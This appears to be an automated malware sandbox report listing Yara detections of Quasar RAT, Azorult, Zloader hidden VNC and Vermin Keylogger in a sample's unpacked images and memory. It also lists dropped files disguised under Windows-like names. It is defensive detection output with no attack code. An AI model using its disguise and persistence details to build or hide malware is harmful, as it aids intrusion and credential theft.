Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
                      Source: Yara matchFile source: dropped/windef.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
                      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00C7D800 CreateDesktopA,GetLastError,GetDC,GetDeviceCaps,GetDeviceCaps,ReleaseDC,lstrcpyA,CloseDesktop,

                      System Summary:

                      Malicious sample detected (through community Yara rule)
                      Source: CVbJSUXraQ.exe, type: SAMPLE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: CVbJSUXraQ.exe, type: SAMPLE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: CVbJSUXraQ.exe, type: SAMPLE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Vermin Keylogger, Author: Florian Roth
                      Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Azorult Payload, Author: kevoreilly
                      Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Azorult Payload, Author: kevoreilly
                      Source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Vermin Keylogger, Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Azorult Payload, Author: kevoreilly
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Vermin Keylogger, Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Vermin Keylogger, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Vermin Keylogger, Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Vermin Keylogger, Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE, Matched rule: Detects Vermin Keylogger, Author: Florian Roth
                      Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE, Matched rule: Azorult Payload, Author: kevoreilly
                      Source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE, Matched rule: Detects Vermin Keylogger, Author: Florian Roth
                      Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Vermin Keylogger, Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPE, Matched rule: Azorult Payload, Author: kevoreilly
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Vermin Keylogger, Author: Florian Roth
